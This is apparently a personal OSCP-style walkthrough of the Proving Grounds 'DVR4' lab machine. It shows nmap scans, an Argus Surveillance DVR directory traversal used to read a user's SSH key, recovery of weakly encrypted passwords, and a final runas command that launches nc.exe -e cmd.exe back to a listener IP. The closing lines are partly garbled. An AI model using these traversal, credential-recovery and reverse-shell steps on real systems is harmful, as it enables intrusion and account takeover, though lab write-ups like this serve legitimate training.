DVR4 - Proving Grounds


Let's start enumerate target machine with nmap.
nmap -sCV -p- --min-rate 1000 -v
Pasted image 20241007211650.png
I have SSH(port 22), RPC(port 135), SMB(port 445), pando-pub(port 7680), http-proxy(port 8080).
Let's enumerate SSH first.

SSH - port 22

Since i have Bitvise WinSSHD 8.48 wich has FlowSsh 8.48 i searched for

SMB - port 445

Let's enumerate all available shares with a Null session.
smbclient -N -L //
Pasted image 20241008082736.png
Since i can't access it let's enumerate Apache server.

Apache - port 8080
Pasted image 20241008082906.png
I have a Argus Surveillance website. Later i saw that there is Administrator and Viewer users created on this website.
Pasted image 20241008083044.png


Argus Surveillance DVR - Directory Traversal

I foundout this link about Argus Surveillance DVR - Directory Traversal and i tried it and it works.
Pasted image 20241008085102.png
I can read the C:\Windows\system.ini.

Expose SSH Private Key

First i need to decode this urlencoded command .
urlencode -d "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
Pasted image 20241008085643.png
So i know that there is Administrator and Viewer users so let's try to find private ssh key on each of them by cahnging the path to C:\Users\Administrator\.ssh\id_rsa and C:\Users\Viewer\.ssh\id_rsa.
Let's browse it with administrator this time.
Pasted image 20241008090155.png
Let's try with viewer.
Pasted image 20241008090232.png
I found out Viewer's private key so let's add to a file and try to access via ssh.
nano id_rsa
chmod 600 id_rsa
ssh Viewer@ -i id_rsa
Pasted image 20241008090639.png

Correct SSH Format

Seems like the private key has a wrong format so let's format it correctly by translate every space into a new line.
cat id_rsa | tr " " "\n"
Pasted image 20241008090816.png
Now format the headers and its good.
Pasted image 20241008090937.png
Let's try again.
chmod 600 id_rsa
ssh Viewer@ -i id_rsa
Pasted image 20241008091026.png

Privilege Escalation

Let's get user flag.
cd Desktop
Pasted image 20241008091113.png
I tried to upload Winpeas but it didn't work.

Argus Surveillance DVR 4.0 - Weak Password Encryption

I found out this link while i was searching for a vulnerability for Argus Surveillance and it shows that Argus Surveillance DVR 4.0 configuration is present in C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
so let's access it.
type C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini
Pasted image 20241008091849.png
Pasted image 20241008091902.png
I foundout 2 passwords that i will decode it with the help of the POC.
chmod +x
Pasted image 20241008092240.png
Pasted image 20241008092314.png
Let's see the other password hash.
Pasted image 20241008092438.png
Pasted image 20241008092459.png
I got ImWatchingY0u password so let's impersonate as Administrator and use this pasword to access it.

Impersonation Attack - nc.exe & runas

I already have nc.exe on the target machine but if i wanted to upload it i would start a python http server and then i upload it.
python3 -m http.server 80
certutil.exe -urlcache -f
nc -lvnp 4444

Let's impersonate Administrator with runas.
runas /user:administrator "C:\users\viewer\desktop\nc.exe -e cmd.exe 4444"
Pasted image 20241008093446.png
Since it doesn't work i will try to see what special character is the last character of 14WatchD0g password wich maybe administrator password. Later i found out that the last Character is **runas/user:administrator"C:\users\viewer\desktop\nc.exeecmd.exe192.168.45.2104444"14WatchD0g![Pasted image 20241008093617.png](/img/user/Digital%20Garden/OSCP/Imgs/Pasted%20image%2020241008093617.png) Let's get root C:\Users\Administrator\Desktop dir`
Pasted image 20241008093708.png